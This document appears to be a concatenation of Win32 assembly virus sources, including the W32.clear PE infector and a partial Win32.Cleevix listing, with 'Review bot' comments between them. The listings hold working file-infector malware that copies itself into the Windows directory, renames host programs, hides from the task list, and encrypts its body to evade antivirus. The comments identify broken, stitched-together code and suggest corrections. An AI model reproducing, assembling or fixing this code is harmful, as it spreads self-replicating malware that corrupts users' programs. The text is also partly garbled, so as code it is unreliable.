push L 1030h ; show a message box
lea eax,virusId
push eax
lea eax,mess
push eax
push L 0
call MessageBoxA
skipPay:
call GetCommandLineA ; get command line
mov dword ptr [commandLine],eax
xor esi,esi ; copy it to get host path
lea edi,hostName ; needed for infection process
copyLoop:
mov bl,byte ptr [eax+esi]
mov byte ptr [edi+esi],bl
cmp bl,0
je skipArgs
inc esi
jmp copyLoop
skipArgs: ; copy host name without args
xor esi,esi
lea edi,hwoArgs
lea eax,hostName
copyLoopb:
mov bl,byte ptr [eax+esi]
mov byte ptr [edi+esi],bl
cmp bl,'.'
je ffirst
inc esi
jmp copyLoopb
ffirst:
mov dword ptr [edi+esi],'EXE.' ; add extension
; now we have arguments in
; hostName and name only in
; hwoArgs
push 0
lea eax,windoze
push eax
lea eax,hwoArgs
push eax
call CopyFileA ; install in windows dir
lea eax,chDir
push eax ; get current directory
push 260
call GetCurrentDirectoryA
cmp eax,0
retDir:
lea eax,chDir
push eax ; restore work directory
call SetCurrentDirectoryA
fnext:
call infectFile
skipThis:
lea eax,findData
push eax
push dword ptr [ffHnd]
call FindNextFileA ; find next *.EXE
cmp eax,0
jne fnext
push dword ptr [ffHnd]
call FindClose ; close ffist/fnext handle
execHost:
xor esi,esi ; copy hostName to future host Name
lea edi,futureHostName
lea eax,hostName
copyLoop2:
mov bl,byte ptr [eax+esi]
mov byte ptr [edi+esi],bl
cmp bl,'.'
je contExec
inc esi
jmp copyLoop2
contExec:
mov dword ptr [edi+esi],'svx.' ; change ext to svx
push 1
push edi
call WinExec ; exec host
cmp eax,32 ; exec error?
jb lastOptionStealth ; je stealth with lame message
goOut:
push L 0h
call ExitProcess ; exit program
infectFile:
xor esi,esi ; copy file found name to
lea edi,futureHostName ; future host name
lea eax,findData
add eax,44
icopyLoop:
mov bl,byte ptr [eax+esi]
mov byte ptr [edi+esi],bl
cmp bl,'.'
je continueInf
inc esi
jmp icopyLoop
continueInf:
mov dword ptr [edi+esi],'svx.' ; change ext to svx
push eax
push edi
push eax
call MoveFileA ; rename the host to *.svx
pop eax
push 0
push eax
lea eax,hwoArgs
push eax
call CopyFileA ; copy current host to new host
; (virus body)
ret
lastOptionStealth: ; lame mess when we can't exec host
push L 1010h ; user can think the program is
push L 0h ; corrupted or windows goes
lea eax,bmess ; wrong (very common =] )
push eax
push L 0
call MessageBoxA
jmp goOut
dcLoop:
push L 0
lea eax,shit
push eax
push L 1
push edi
push dword ptr [fHnd]
cmp byte ptr [edi],0ffh
jne skipFF
dec dword ptr [cont0]
call addFF
inc edi
skipFF:
inc edi
dec dword ptr [cont0]
cmp dword ptr [cont0],0
jne dcLoop
push dword ptr [fHnd] ; close file
call CloseHandle
addFF:
xor ecx,ecx
mov cl,byte ptr [edi+1]
mov byte ptr [cont1],cl
cmp cl,0
jne addFFLoop
ret
addFFLoop:
push L 0
lea eax,shit
push eax
push L 1
push edi
push dword ptr [fHnd]
dec byte ptr [cont1]
cmp byte ptr [cont1],0
jne addFFLoop
ret
Ends
End virus
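Review bot: As published this listing cannot be assembled into the virus its header describes, because the `end start` directive that closes the pasted SEH demo (the `szTitle` string literally reads "Structured Exception Handler example") terminates assembly before the `virus:` entry point, the `Ends` line and the second `End virus` are ever reached. The drive-enumeration fragment between `bmess` and `virus:` also references `GetLogicalDriveStrings`, `GetDriveType`, `DRIVE_REMOTE`, `infectDrive` and `GetNextZero`, none of which appear in the `extrn` list or anywhere else in this file, and the `dcLoop`/`addFFLoop` routines push five arguments per iteration without ever issuing a call, so they are dead, stack-unbalanced code rather than a write routine. For a corpus entry this should be stated up front so nobody treats the file as a buildable sample; the reliable analyst hooks are the strings (`C:\Windows\System\Sys\Porn.exe`, the `.svx` rename of the host, the `Invalid call in shared memory` message) and the `GetSystemTime` payload date check. I would add under the header: `; NOTE: this file is a concatenation of an SEH tutorial, a drive-scan fragment with undeclared symbols, and the virus body; it does not assemble as-is (two END directives, unmatched ENDS) and is kept for reference only`.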
+443
@@ -0,0 +1,443 @@
; [ W32.clear by drcmda ]
; -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
; SIMPLE BUT CLEAR WIN32 PE INFECTOR, USES SIMPLE XOR ENCRYPTION,
; MUTEXES AND DIRECTORY TRAVERSEL (ON EVERY FIXED DRIVE)... I FOR
; MYSELF DON'T LIKE VIRII BUT SINCE I DISCOVERED THE PE-HEADER I
; JUST WANTED TO WRITE ONE :) I TRIED TO UNDERSTAND 100% OF THE
; TECHNIQUES USED FOR THIS PURPOSE SO I WROTE EVERY ROUTINE IN THIS
; VIRUS ON MY OWN. I ALSO TRIED TO OPTIMIZE COMMON STRUCTURES LIKE
; INFECTING, API-BASE SEARCHING, DIR-SCANNING, ... I WOULD NEVER
; SPREAD A VIRUS, I WROTE THIS JUST TO GET A BETTER GRIP WITH THE
; PE HEADER ;) HEHE BYE... - DRCMDA [ DRCMDA@GMX.DE ] (C) 2001
; -----------------------------------------------------------------
; P L E A S E D O N O T C O M P I L E (A N D R U N !) T H I S
; -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
.486
.MODEL FLAT, STDCALL
OPTION CASEMAP: NONE
INCLUDE \MASM32\INCLUDE\KERNEL32.INC
INCLUDELIB \MASM32\LIB\KERNEL32.LIB
VIRUS_SIZE EQU VIRUS_END - VIRUS_START
MAX_PATH EQU 104H
OF_READ EQU 000H
GHND EQU 002H OR 040H
FILE_ATTRIBUTE_NORMAL EQU 080H
FILE_ATTRIBUTE_DIR EQU 010H
DRIVE_FIXED EQU 003H
.CODE
FIRST_GEN:
PUSH 0
CALL ExitProcess
VIRUS_START:
PUSHAD
CALL DELTA
DELTA: POP EBP
SUB EBP, DELTA ; EBP = DELTA OFFSET
XOR_KEY:MOV DH,0 ; WILL BE PATCHED LATER...
LEA ESI, [ EBP + E_START ] ; SO NO XOR EDX, EDX :)
PUSH ESI
MOV ECX, VIRUS_END - E_START
;________________ _ _ _ [ -ENCRYPT- ] _ _ _ __
ENCRYPT:XOR BYTE PTR [ ESI ], DH ; EN/DE-CRYPTS THE VIRUS_BDY
ROL DH, 1 ; VERY LAME I KNOW...
INC ESI
DEC ECX
JNZ ENCRYPT
RET
E_START:CALL GET_KERNEL ; GET KERNEL BASE
MOV ECX, 27
LEA ESI, [ EBP + ___KERNEL32 ]
CALL GET_APIS ; GET KERNEL API'S
CALL _M01
DB "blablabla",0
_M01: PUSH 1
PUSH 0
CALL [ _CREATEMUTEX ]
CALL [ _GETLASTERROR ]
TEST EAX, EAX
JNZ MUTEX_EXIST
PUSH 1
PUSH 0
CALL [ EBP + _RSP ] ; TRY TO HIDE FROM TASK-LIST
CALL [ EBP + _GETCOMMANDLINE ] ; START REAL HOST WITH WINEXIT
PUSH 1 ; NOW THE USER WON'T NOTIZE
PUSH EAX ; ANY LOADING-TIME INCREASE
CALL [ EBP + _WINEXEC ]
CALL INFECT_EVERYTHING ; THE NAME SAYS ALL :)
PUSH 0
PUSH 0
CALL [ EBP + _BEEP ]
PUSH 0
CALL [ EBP + _EXITPROCESS ] ; WE'RE DONE, THE ENTIRE FUCKING
; COMPUTER SHOULD BE INFECTED :)
MUTEX_EXIST:
ERR_EXT:POPAD
HRETURN:PUSH DWORD PTR OFFSET FIRST_GEN ; RETURN TO HOST
RET ; WILL BE PATCHED LATER
;________________ _ _ _ [ -GET_KERNEL- ] _ _ _ __
GET_KERNEL: ; RETURNS THE KERNEL BASE
MOV ECX, [ ESP + 9 * 4 ] ; SIMPLE BUT SMALL :)
@@: DEC ECX
MOVZX EDX, WORD PTR [ ECX + 03CH ] ; EDX = POINTER TO PE_HDR
CMP ECX, [ ECX + EDX + 034H ] ; COMPARE CURRENT BASE WITH
JNZ @B ; THE KERNEL IMAGE_BASE (MZ)
MOV [ EBP + _KERNEL ], ECX ; STORE RESULT
MOV [ EBP + _DEFAULT ], ECX
RET
;________________ _ _ _ [ -GET_APIS- ] _ _ _ __
GET_APIS: ; SCANS THROUGH API TABLE
INC ESI ; AND RETURNS ADDRESSES
PUSH ECX
CALL GET_API ; SEARCH SINGLE API ADDRESS
POP ECX
MOVZX EBX, BYTE PTR [ ESI - 1 ]
ADD ESI, EBX ; STORE ADDRESS IN THE
MOV [ ESI ], EAX ; API TABLE...
ADD ESI, 4
LOOP GET_APIS ; NEXT ONE
RET
;________________ _ _ _ [ -GET_API- ] _ _ _ __
GET_API: ; SCANS FOR A SINGLE API ADR
MOV EDX, [ EBP + _DEFAULT ] ; EDX = DEFAULT MODULE BASE
ADD EDX, [ EDX + 03CH ] ; + OFFSET PE_HEADER
MOV EDX, [ EDX + 078H ] ; EDX = PTR EXPORT_DIR RVA
ADD EDX, [ EBP + _DEFAULT ] ; + BASE
MOV EDI, [ EDX + 020H ] ; EDI = PTR ADDRESS_OF_NAMES RVA
ADD EDI, [ EBP + _DEFAULT ] ; + BASE
MOV EDI, [ EDI ] ; EDI = PTR ADR_OF_NAMES RVA
ADD EDI, [ EBP + _DEFAULT ] ; + BASE
MOV EAX, [ EDX + 018H ] ; EAX = NUMBER_OF_NAMES
XOR EBX, EBX
NXT_ONE:INC EBX
MOVZX ECX, BYTE PTR [ ESI - 1 ] ; LENGHT OF SPEZIFED API NAME
PUSH ESI
PUSH EDI
REPZ CMPSB ; COMPARE API NAME WITH
POP EDI ; EXPORT ENTRY
POP ESI
JZ FOUND
PUSH EAX
XOR AL, AL
SCASB ; GET NEXT ONE
JNZ $ - 1
POP EAX
DEC EAX ; DECREASE NUMBER_OF_NAMES
JZ ERR_EXT
JMP NXT_ONE
FOUND: MOV ECX, [ EDX + 024H ] ; ECX = PTR NBR_NAME_ORDS RVA
ADD ECX, [ EBP + _DEFAULT ] ; + BASE
DEC EBX
MOVZX EAX, WORD PTR [ ECX + EBX * 2 ] ; EAX = ORDINAL OF FUNCTION
MOV EBX, [ EDX + 01CH ] ; EBX = PTR ADR_OF_FUNCTIONS RVA
ADD EBX, [ EBP + _DEFAULT ] ; + BASE
MOV EAX, [ EBX + EAX * 4 ] ; EAX = FUNCTION RVA!!!!
ADD EAX, [ EBP + _DEFAULT ] ; + BASE
RET
;________________ _ _ _ [ -INFECT_EVERYTHING- ] _ _ _ __
INFECT_EVERYTHING: ; INFECTS EVERY FIXED DRIVE!!!
LEA EAX, [ EBP + DRIVES ] ;
MOV [ EBP + OFS ], EAX ; GET DRIVE STRINGS
PUSH EAX
PUSH 50
CALL [ EBP + _GETLOGICALDRIVESTRINGS ]
LOOP_: PUSH [ EBP + OFS ]
CALL [ EBP + _GETDRIVETYPE ] ; IS IT A FIXED DRIVE???
CMP EAX, DRIVE_FIXED
JNZ BAHHH
PUSH [ EBP + OFS ]
CALL [ EBP + _SETCURRENTDIR ]
CALL INFECT_DRIVE ; LET'S INFECT IT :)
BAHHH: ADD [ EBP + OFS ], 4 ; GET NEXT CANDIDATE
MOV EAX, [ EBP + OFS ]
CMP BYTE PTR [ EAX ], 0
JNZ LOOP_
RET
;________________ _ _ _ [ -INFECT_DRIVE- ] _ _ _ __
INFECT_DRIVE: ; INFECTS THE WHOLE DRIVE :)
LEA EAX, [ EBP + W32FINDDATA ] ;
PUSH EAX
LEA EAX, [ EBP + FILE_MASK ]
PUSH EAX
CALL [ EBP + _FINDFIRSTFILE ] ; START SEARCHING
INC EAX
JZ _S_OUT
DEC EAX
MOV [ EBP + S_HANDLE ], EAX
_S_SCAN:CMP [ EBP + F_OATTRIBS ], FILE_ATTRIBUTE_DIR
JNZ NODIR
cmp BYTE PTR [ EBP + FILENAME ],"." ; "." AND ".." ARE NOT NEEDED...
JZ _NEXT
LEA EAX, [ EBP + FILENAME ] ; IF WE FOUND A DIRECTORY WE SET
PUSH EAX ; SET THE CUR DIR TO THIS PLACE AND
CALL [ EBP + _SETCURRENTDIR ] ; CONTINUE THE SEARCH THERE...
PUSH [ EBP + S_HANDLE ] ; SAVE SEARCH HANDLE
call INFECT_DRIVE ; RECURSIVE
POP [ EBP + S_HANDLE ] ; GET OLD HANDLE AND CONTINUE
JMP _NEXT
NODIR: LEA EAX, [ EBP + FILENAME ]
PUSH EAX
CALL [ EBP + _LSTRLEN ] ; EXCUSE MY LAZYNESS :)
CMP DWORD PTR [ EBP + FILENAME + EAX - 4 ], "EXE."
JZ _1
CMP DWORD PTR [ EBP + FILENAME + EAX - 4 ], "exe."
JNZ _NEXT
_1: CMP [ EBP + FILESIZEH ], 0 ; ONLY FILES UNDER 4 GIGS...
JNZ _NEXT
CALL INFECT_FILE ; EXE FOUND SO INFECT IT!
_NEXT: PUSH 100 ; WAIT 100ms NOW THE USER SHOULDN'T
CALL [ EBP + _SLEEP ] ; NOTIZE ANY DISK-USAGE... (HOPE SO)
LEA EAX, [ EBP + W32FINDDATA ]
PUSH EAX
PUSH [ EBP + S_HANDLE ]
CALL [ EBP + _FINDNEXTFILE ] ; GRAB SEARCH_HANDLE AND SEARCH
TEST EAX, EAX ; MORE FILES THAT ARE MATCHING TO
JNZ _S_SCAN ; OUR PATTERN ("*")...
LEA EAX, [ EBP + BACK ]
PUSH EAX
CALL [ EBP + _SETCURRENTDIR ] ; ".." MEANS GET ONE DIR BACK
PUSH [ EBP + S_HANDLE ]
CALL [ EBP + _FINDCLOSE ]
_S_OUT: RET
;________________ _ _ _ [ -OPEN_FILE- ] _ _ _ __
INFECT_FILE: ; OPENS A FILE AND ALLOCATE MEM
PUSH FILE_ATTRIBUTE_NORMAL ; I DON'T USE FILEMAPPING COZ
LEA EAX, [ EBP + FILENAME ] ; I SIMPLY HATE IT... IMAGINE
PUSH EAX ; YOU MAP A FILE AND BEGIN TO
CALL [ EBP + _SETFILEATTRIBUTES ] ; MAKE THE FIRST CHANGES, NOW
; YOU REALIZE THE PE IS NOT
PUSH OF_READ ; VALID OR CORRUPTED (PACKED
LEA EAX, [ EBP + FILENAME ] ; FILES OR SOME MS PE'S
PUSH EAX ; [OUTLOOK])... THIS PE SHOULD
CALL [ EBP + __LOPEN ] ; BE HISTORY NOW :) I USED IT
MOV [ EBP + FILEHANDLE ], EAX ; BEFORE AND MUST SAY THAT
MOV EAX, [ EBP + FILESIZE ] ; I HAD TONS OF PROBLEMS WITH
ADD [ EBP + MAPSIZE ], EAX ; THIS TECHNIQUE...
PUSH [ EBP + MAPSIZE ]
PUSH GHND
CALL [ EBP + _GLOBALALLOC ]
MOV [ EBP + H_BUFFER ], EAX
PUSH EAX
CALL [ EBP + _GLOBALLOCK ] ; ALLOCATE MEM FOR THE FILE +
TEST EAX, EAX ; VIRUS_BODY
JZ _EXIT
MOV [ EBP + M_BUFFER ], EAX
PUSH [ EBP + FILESIZE ]
PUSH [ EBP + M_BUFFER ]
PUSH [ EBP + FILEHANDLE ]
CALL [ EBP + __LREAD ] ; READ ENTIRE FILE TO BUFFER
PUSH [ EBP + FILEHANDLE ]
CALL [ EBP + __LCLOSE ]
;________________ _ _ _ [ -INFECT_FILE- ] _ _ _ __
MOV EDI, [ EBP + M_BUFFER ] ; EDI = POINTER TO MEM BLOCK
CMP WORD PTR [ EDI ], "ZM" ; DO SOME CHECKS (MZ/PE/INFMARK)
JNZ _EXIT
ADD EDI, [EDI + 03CH] ; EDI = POINTER TO PE_HDR
CMP WORD PTR [ EDI ], "EP"
JNZ _EXIT
CMP DWORD PTR [ EDI + 04CH ], 0
JNZ _EXIT
; RETURN LAST SECTION
MOV ECX, [ EDI + 074H ] ; ECX = NUMBER_OF_RVA_AND_SIZES
LEA ECX, [ ECX * 8 + EDI ] ; x 8 + OFFSET PE_HEADER
MOVZX EAX, WORD PTR [ EDI + 006H ] ; EAX = NUMBER_OF_SECTIONS
DEC EAX ; - 1
LEA EBX, [ EAX + EAX * 4 ] ; EBX = EAX x 28H
LEA EBX, [ EBX * 8 ] ; ...
LEA EBX, [ EBX + ECX + 078H ] ; EBX = EBX + ECX + 078H
MOV EAX, VIRUS_SIZE
XADD [ EBX + 008H ], EAX ; CHANGE VIRTUALSIZE
CMP EAX, [ EBX + 010H ]
JA _EXIT
PUSH EAX
PUSH DWORD PTR [ EBX + 010H ]
ADD EAX, VIRUS_SIZE
XOR EDX, EDX
MOV ECX, [ EDI + 03CH ]
DIV ECX
INC EAX
IMUL EAX, ECX
MOV [ EBX + 010H ], EAX ; CHANGE SIZE_OF_RAW_DATA
POP ECX
MOV EAX, [ EBX + 010H ]
SUB EAX, ECX ; CHANGE SIZE_OF_IMAGE
ADD [ EDI + 050H ], EAX
; CHANGE ATTRIBS & INFMARK
OR DWORD PTR [ EBX + 024H ], 0C0000000H
MOV DWORD PTR [ EDI + 04CH ], "BDHP"
POP EAX
ADD EAX, [ EBX + 00CH ]
XCHG [ EDI + 028H ], EAX ; CHANGE ENTRY_POINT
ADD EAX, [ EDI + 034H ]
MOV EDI, [ EBX + 014H ] ; VIRUS_POS = VIRT_ADR +
ADD EDI, [ EBX + 008H ] ; VIRT_SIZE
MOV ECX, VIRUS_SIZE
SUB EDI, ECX
ADD EDI, [ EBP + M_BUFFER ]
LEA ESI, [ EBP + VIRUS_START ]
REP MOVSB ; WRITE VIRUS_BODY TO BUFFER
;________________ _ _ _ [ -CLOSE_FILE- ] _ _ _ __
ADD BYTE PTR [ EBP + XOR_KEY + 1 ], 10
MOV DH, BYTE PTR [ EBP + XOR_KEY + 1 ]
MOV BYTE PTR [ EDI - ( VIRUS_END - XOR_KEY ) + 1 ], DH
MOV [ EDI - ( VIRUS_END - HRETURN ) + 1 ], EAX
LEA ESI, [ EDI - ( VIRUS_END - E_START ) ]
MOV ECX, VIRUS_END - E_START
CALL ENCRYPT ; ENCRYPT VIRUS_BODY
PUSH 0 ; TRUNCATE FILE AND OPEN
LEA EAX, [ EBP + FILENAME ] ; FILE FOR WRITE ACCESS
PUSH EAX ; (FILE ATTRIBS ARE SET ABOVE)
CALL [ EBP + __LCREAT ]
INC EAX
JZ _EXIT
MOV EAX, [ EBX + 014H ] ; FILESIZE = VIRT_ADR +
ADD EAX, [ EBX + 010H ] ; SIZE_OF_RAW_DATA
PUSH EAX
PUSH [ EBP + M_BUFFER ] ; WRITE BUFFER TO FILE...
PUSH [ EBP + FILEHANDLE ] ; CLOSE FILE...
CALL [ EBP + __LWRITE ] ; GET RID OF THOSE MEMORY
PUSH [ EBP + FILEHANDLE ] ; POINTERS AND FREE MEMORY...
CALL [ EBP + __LCLOSE ] ; SET OLD FILE ATTRIBUTES
_EXIT: PUSH [ EBP + M_BUFFER ]
CALL [ EBP + _GLOBALUNLOCK ]
PUSH [ EBP + H_BUFFER ]
CALL [ EBP + _GLOBALFREE ]
PUSH [ EBP + F_OATTRIBS ]
LEA EAX, [ EBP + FILENAME ]
PUSH EAX
CALL [ EBP + _SETFILEATTRIBUTES ]
RET
;________________ _ _ _ [ -VIRUS_DATA- ] _ _ _ __
___KERNEL32: ;
DB 06,"_lopen" ; API TABLE
__LOPEN DD 0 ; WILL BE FILLED UP WITH ADR'S
DB 06,"_lread" ; FROM A SPEZIFED MODULE-EXPORT
__LREAD DD 0 ; TABLE (IN THIS CASE KERNEL32)
DB 07,"_lwrite"
__LWRITE DD 0
DB 07,"_lclose"
__LCLOSE DD 0
DB 07,"_lcreat"
__LCREAT DD 0
DB 11,"GlobalAlloc"
_GLOBALALLOC DD 0
DB 10,"GlobalLock"
_GLOBALLOCK DD 0
DB 12,"GlobalUnlock"
_GLOBALUNLOCK DD 0
DB 10,"GlobalFree"
_GLOBALFREE DD 0
DB 13,"FindFirstFile"
_FINDFIRSTFILE DD 0
DB 12,"FindNextFile"
_FINDNEXTFILE DD 0
DB 09,"FindClose"
_FINDCLOSE DD 0
DB 17,"SetFileAttributes"
_SETFILEATTRIBUTES DD 0
DB 17,"GetFileAttributes"
_GETFILEATTRIBUTES DD 0
DB 19,"SetCurrentDirectory"
_SETCURRENTDIR DD 0
DB 22,"GetLogicalDriveStrings"
_GETLOGICALDRIVESTRINGS DD 0
DB 12,"GetDriveType"
_GETDRIVETYPE DD 0
DB 07,"lstrlen"
_LSTRLEN DD 0
DB 04,"Beep"
_BEEP DD 0
DB 11,"CreateMutex"
_CREATEMUTEX DD 0
DB 12,"ReleaseMutex"
_RELEASEMUTEX DD 0
DB 12,"GetLastError"
_GETLASTERROR DD 0
DB 11,"ExitProcess"
_EXITPROCESS DD 0
DB 22,"RegisterServiceProcess"
_RSP DD 0
DB 14,"GetCommandLine"
_GETCOMMANDLINE DD 0
DB 07,"WinExec"
_WINEXEC DD 0
DB 05,"Sleep"
_SLEEP DD 0
_KERNEL DD 0 ; BASE PLACEHOLDERS
_DEFAULT DD 0
MAPSIZE DD VIRUS_SIZE + 1000H
FILEHANDLE DD 0
H_BUFFER DD 0
M_BUFFER DD 0
W32FINDDATA: ; WIN32_FIND_DATA STRUC
F_OATTRIBS DD 0
DD 6 DUP ( 0 )
FILESIZEH DD 0
FILESIZE DD 0
DD 2 DUP ( 0 )
FILENAME DB MAX_PATH DUP ( 0 )
DB 14 DUP ( 0 )
FILE_MASK DB "*", 0
DRIVES DB 50 dup ( 0 )
BACK DB "..", 0
S_HANDLE DD 0
OFS DD 0
VIRUS_END:
END VIRUS_START
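Review bot: The API-resolution failure path is broken: `JZ ERR_EXT` in `GET_API` fires after `NUMBER_OF_NAMES` is exhausted, but it is reached two call levels deep (`GET_APIS` has pushed `ECX` and its return address, `GET_API` its own), so the `POPAD` at `ERR_EXT` restores three dwords of stack garbage into the registers and the `PUSH FIRST_GEN / RET` at `HRETURN` runs on a shifted stack instead of handing control back to the host. This path is live rather than theoretical, since the API table asks for `RegisterServiceProcess`, which to my knowledge only the Win9x kernel32 exports; on NT-family hosts the sample would crash in the lookup rather than run the host, which is consistent with the author's "do not run" banner. Note also that the match is `REPZ CMPSB` over the declared length with no terminator check, i.e. prefix matching, which is why entries such as `FindFirstFile` and `CreateMutex` resolve at all (to the first export that begins with that prefix, presumably the `A` variant given the sorted name table). I would document this next to `GET_API`: `; NOTE: prefix-only compare; a miss jumps to ERR_EXT from inside GET_APIS->GET_API with 3 extra dwords on the stack, so POPAD there restores garbage (hit on NT kernels lacking RegisterServiceProcess)`. Separately, for recovery work, the `_lwrite` length is `PointerToRawData + SizeOfRawData` of the last section, so any overlay beyond that in the original file is dropped on infection.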
+717
@@ -0,0 +1,717 @@
;-------------------------------------------------------------------------------
;Win32.Cleevix (c)opyright 2005 by lclee_vx
;
;Win32.Cleevix is a PE infector on Windows 9x/2K/XP with simple encryption, anyhow,
;its not detect by Norton Antivirus. :)!!
;
;
;
;Description
;-----------
;When a file infected by Win32.Cleevix is executed, the virus start the process
;as below:
;
;1) Retrieve the base address of Kernel32.dll
;2) Scans the Export Table of Kernel32.dll for the API Functions
;3) Retrieve API functions by scanning others *.dll file. For example, retrieve
; MessageBox function from User32.dll file.
;4) Scan the Current, Windows and System directory, infect all the *exe files.
; Infected files will grow by about 2.99 Kilobyte
;5) The virus do not try to harm/damage the system, its just patch itself to the
; PE files. Anyhow, it might bring down the system as the scanning process running.
;6) The virus apply the simple encryption, its not detected by Norton Antivirus (tested)
;
;
;That is about all folks. The code is heavily commented, so, it should be easy
;enough to follow.
;
; Disclaimer
; ----------
;THIS CODE IS MEANT FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR CANNOT BE HELD
;RESPONSIBLE FOR ANY DAMAGE CAUSED DUE TO USE, MISUSE OR INABILITY TO USE THE
;SAME
;
;
;Author : lclee_vx
;Group : F-13 Labs
;Web : http://f13.host.sk
;Email : lclee_vx@yahoo.com
;----------------------------------------------------------------------------------
.386p
.model flat, stdcall
option casemap:none
jumps
.data
;------------------------------------------------------------------------------
;Start The Code
;------------------------------------------------------------------------------
.code
VirusStart:
call delta
delta:
pop ebp
mov eax, ebp
sub ebp, offset delta
sub eax, RedundantSize
sub eax, 1000h
NewEip equ $-4
mov dword ptr [ebp+AppBase], eax
mov esi, [esp]
and esi, 0FFFF0000h
pushad
call Crypt
popad
CryptStart:
call GetK32
mov dword ptr [ebp+offset aKernel32], eax ;save kernel32.dll
;-------------------------------------------------------------------------------
;here we looking for APIs function
;-------------------------------------------------------------------------------
lea edi, [ebp+offset @@Offsetz]
lea esi, [ebp+offset @@Namez]
call GetApis
call SpecialApi
call DirScan
CryptEnd:
cmp ebp, 0
je FirstGeneration
ReturnHost:
mov eax, 12345678h
org $-4
OldEip dd 00001000h
mov eax, dword ptr [ebp+offset OldEip]
jmp eax
ret
;-------------------------------------------------------------------------------
;1) Changing to Windows directory, System directory and current directory
;2) remember size buffer have to set > Max_Path (260)
;-------------------------------------------------------------------------------
DirScan:
push 128h ;have to set Buffer size > 260
lea eax, [ebp+offset WindowsDir] ;retrieve the path of Windows
;Directory
push eax
mov eax, dword ptr [ebp+offset aGetWindowsDirectoryA]
call eax
push 128h ;buffer size > 260
lea eax, [ebp+offset SystemDir] ;retrieve the path of System
push eax ;directory
mov eax, [ebp+offset aGetSystemDirectoryA]
call eax
lea eax, [ebp+offset CurrentDir] ;retrieve the path of Current
push eax ;directory
push 128h ;buffer size > 260
mov eax, [ebp+offset aGetCurrentDirectoryA]
call eax
lea eax, [ebp+offset WindowsDir]
push eax
mov eax, [ebp+offset aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles ;start searching the target files
lea eax, [ebp+offset SystemDir]
push eax
mov eax, [ebp+offset aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles
lea eax, [ebp+offset CurrentDir]
push eax
mov eax, [ebp+offset aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles
ret
;-------------------------------------------------------------------------------
;1) Search the target files (*.exe)
;2) Trying Infect 3 files
;-------------------------------------------------------------------------------
SearchFiles:
push ebp ;save ebp
lea eax, dword ptr [ebp+offset Win32FindData] ;load the Win32_Find_Data structure
push eax
lea eax, [ebp+offset Mark] ;search *.exe
push eax
mov eax, [ebp+offset aFindFirstFileA] ;start searching
call eax
pop ebp
inc eax ;check with eax=FFFFFFFF+1
jz SearchClose ;fail :(
dec eax ;get the original FileHandle
mov dword ptr [ebp+offset SearchHandle], eax ;save FileHandle
mov esi, offset Win32FindData.FileName ;esi=pointer to FileName
add esi, ebp
mov dword ptr [ebp+offset FilePointer], esi ;save the Pointer to FileName
cmp [Win32FindData.FileSizeHigh+ebp], 0 ;high 32 bits of FileSize
jne SearchNext ;way too big for us
mov ecx, [Win32FindData.FileSizeLow+ebp] ;ecx=File Size
mov dword ptr [ebp+offset NewFileSize], ecx ;NewFileSize will change in InfectFiles
mov dword ptr [ebp+offset OriFileSize], ecx ;routine
push dword ptr [ebp+offset OldEip]
call InfectFiles
pop dword ptr [ebp+offset OldEip]
dec dword ptr [ebp+offset Counter] ;Counter - 1
cmp dword ptr [ebp+offset Counter], 0
je SearchHandleClose
SearchNext:
push ebp
mov eax, dword ptr [ebp+offset Win32FindData]
push eax
mov eax, dword ptr [ebp+offset SearchHandle] ;eax=Search Handle
push eax
mov eax, [ebp+offset aFindNextFileA]
call eax
pop ebp
cmp eax, 0 ;error?
je SearchHandleClose ;done
mov esi, offset Win32FindData.FileName
add esi, ebp
mov dword ptr [ebp+offset FilePointer], esi ;esi=File Pointer
cmp [Win32FindData.FileSizeHigh+ebp], 0
jne SearchNext
mov ecx, [Win32FindData.FileSizeLow+ebp] ;ecx=File Size
mov dword ptr [ebp+offset NewFileSize], ecx ;save it
mov dword ptr [ebp+offset OriFileSize], ecx
push dword ptr [ebp+offset OldEip]
call InfectFiles
pop dword ptr [ebp+offset OldEip]
dec dword ptr [ebp+offset Counter] ;Counter - 1
cmp dword ptr [ebp+offset Counter], 0
jne SearchNext
SearchHandleClose:
push dword ptr [ebp+offset SearchHandle]
mov eax, [ebp+offset aFindClose]
call eax
cmp eax, 0
je SearchClose
SearchClose:
ret
;----------------------------------------------------------------------------------
;Here start to set the file attributes, mapping files and infect the files
;(1) save the original FileSize, FileAttribute
;(2) Open the file with API CreateFileA. if error,
;----------------------------------------------------------------------------------
InfectFiles:
pushad ;save all the register before
;start infect
mov dword ptr [ebp+offset InfectFlag], 0
mov ecx, dword ptr [ebp+offset NewFileSize]
cmp ecx, MinimumFileSize ;minimum FileSize=400h
jb JumpOut
add ecx, total_size
mov dword ptr [ebp+offset NewFileSize], ecx
push ebp
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aGetFileAttributesA]
call eax
pop ebp
mov dword ptr [ebp+offset FileAttribute], eax ;save the original file attribute
push ebp
push 00000080h ;set file attribute = any
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aSetFileAttributesA]
call eax
pop ebp
cmp eax, 0 ;error?
jz ErrorOpenExe
push ebp
push 0h
push 00000080h
push 00000003h
push 0h
push 00000001h
push 80000000h or 40000000h
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aCreateFileA]
call eax
pop ebp
inc eax ;if error, eax=0FFFFFFFFh. eax = eax+1
cmp eax, 0 ;error?
jz ErrorOpenExe
dec eax
mov dword ptr [ebp+offset FileHandle], eax ;save the FileHandle
push ebp
push dword ptr [ebp+offset NewFileSize]
push 0h
mov eax, [ebp+offset aGlobalAlloc]
call eax
pop ebp
cmp eax, 0h
jz ErrorBuffer ;error?
mov dword ptr [ebp+offset MemoryHandle], eax ;save
push ebp
lea eax, [ebp+offset ByteRead]
push 0h
push eax
push dword ptr [ebp+offset OriFileSize]
push dword ptr [ebp+offset MemoryHandle]
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aReadFile]
call eax
pop ebp
cmp eax, 0h ;error?
jz ErrorReadExe
push ebp
push 0h
push 0h
push 0h
push dword ptr [ebp+offset FileHandle]
